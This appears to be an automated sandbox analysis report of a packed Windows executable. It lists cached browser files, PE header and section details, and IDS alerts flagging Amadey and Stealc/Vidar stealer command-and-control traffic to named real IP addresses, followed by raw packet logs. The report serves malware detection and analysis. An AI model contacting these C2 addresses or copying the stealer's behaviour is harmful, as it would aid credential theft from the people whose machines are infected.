URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTus2ZfPv70D5bJuGT4XDgi-VtNqjg"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 533

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 534

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132991
Entropy (8bit):	5.435703844868481
Encrypted:	false
SSDEEP:	3072:fskXyPqO7UX1Hme9kZbs4Voc5xSnXqwQ2i6o:fHyWFHrp4Voc5xSnawQ8o
MD5:	CF31558B6C1956C10FDEEEB46DAA95DB
SHA1:	6FAFD866DF520608B09EA66A1FECF968D25D7543
SHA-256:	7DC1D4DFDF72052C7488283BFD45A1D5DB058CA2DCAE0FDC66202A7C8C643F76
SHA-512:	8B869741402A2CEBA0645EC90945B1BD834856B6393817CFCB7D188F748A6953AB6EAE96CA4BEFDD30A688A5EFCBCE58587C2773A7D3893FC517B1FEBBFCE2F7
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 535

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 536

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945696897130883
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'795'584 bytes
MD5:	ae62896aac2820ebe9235b01b2370128
SHA1:	676a436318647235e6068e3e56408491c4ae46d1
SHA256:	78f8f56de1d7fe369fa9b7dfdf52d43af4ed2abb6ba0a05cd8adbdbf078ca405
SHA512:	3e692ab535e4e3d0cf53a92fd0beb0554eb449de2abe71391a54d8ad0965d8f4481d5155413a4638264c7fa555219f4195b1116e6631e9fdd63604805dfc1626
SSDEEP:	49152:GPbySxvltkwC8cVPXWC1cz+dmh4kHe/2s:sbhwfVPX9cz+dmhn+b
TLSH:	228533EF2FB6694BE27A3435DC6A32373A5BD3F086579C7E2044137942818B8D6258F1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa91000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FBE4518F29Ah
cmove ebx, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	4b7b72566259619ddfbe46bdac08b77f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x2b0	0x200	48d6195b3c96a472aa875bdcdaffa9dc	False	0.802734375	data	6.079696362430706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2a7000	0x200	0c3ed4ef57cbbe8dece35a37c5e6cab5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dpgvilua	0x4f3000	0x19d000	0x19c800	2b32ae1d3c9e228826ca3741d429892a	False	0.9945306581439394	data	7.955208433759049	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wsdjkgyh	0x690000	0x1000	0x400	134ed51f0f3a5004c25ee36f2226c710	False	0.771484375	data	6.081529243786086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x691000	0x3000	0x2200	d87f93cf176549d271ded34a7f55fde4	False	0.06893382352941177	DOS executable (COM)	0.7319484931644515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x68f3c0	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T00:25:03.194035+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	50108	TCP
2024-11-26T00:25:13.994828+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:14.444588+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:14.567471+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.6	49715	TCP
2024-11-26T00:25:14.896173+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:15.019928+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.6	49715	TCP
2024-11-26T00:25:16.356531+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:17.086882+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:40.611919+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:42.540264+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:43.878951+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:45.002968+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:48.636589+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:49.714057+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:55.803815+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49930	185.215.113.16	80	TCP
2024-11-26T00:27:06.296496+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	50101	185.215.113.43	80	TCP
2024-11-26T00:27:10.840055+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50112	31.41.244.11	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 00:25:03.194035053 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.194057941 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.194072008 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.194128036 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.194276094 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.194276094 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.199925900 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.215116978 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215131044 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215145111 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215208054 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.215301037 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215317965 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215332031 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.215377092 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.215398073 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.223741055 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.223887920 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.223937988 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.232254982 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.232268095 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.232307911 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.264710903 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.264710903 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.319926977 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.384675980 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.435631990 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.435746908 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.435761929 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.435774088 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.758299112 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.762322903 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.762518883 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.762629032 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:03.883560896 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.884052992 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.885179996 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:03.928729057 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.928751945 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.928906918 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.930974007 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.931107044 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.931180000 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.939548016 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.939682961 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.939749002 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.948170900 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.948297024 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.948362112 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.956804991 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.956877947 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:03.956947088 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:03.965250015 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.010325909 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.194492102 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.194564104 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.200872898 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.200938940 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.201021910 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.223015070 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.223037958 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.316445112 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.316467047 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.316478968 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.316494942 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.317926884 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.318840981 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:04.369673014 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:04.552887917 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:04.604100943 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:04.752713919 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.752763033 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.752871990 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.753858089 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:04.754947901 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:04.755126953 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.755208015 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.755264044 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.763685942 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.763771057 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.763834000 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.772351027 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.772383928 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.772486925 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.780827999 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.780922890 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.780998945 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.789438963 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:04.838375092 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:04.876575947 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:05.309859991 CET	443	49707	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:05.316510916 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.316602945 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:05.316701889 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.318335056 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.318375111 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:05.354013920 CET	49707	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:05.369669914 CET	49674	443	192.168.2.6	173.222.162.64
Nov 26, 2024 00:25:05.369674921 CET	49673	443	192.168.2.6	173.222.162.64
Nov 26, 2024 00:25:05.590415955 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.590527058 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:05.590663910 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.590960026 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:05.590996027 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:05.650953054 CET	49672	443	192.168.2.6	173.222.162.64
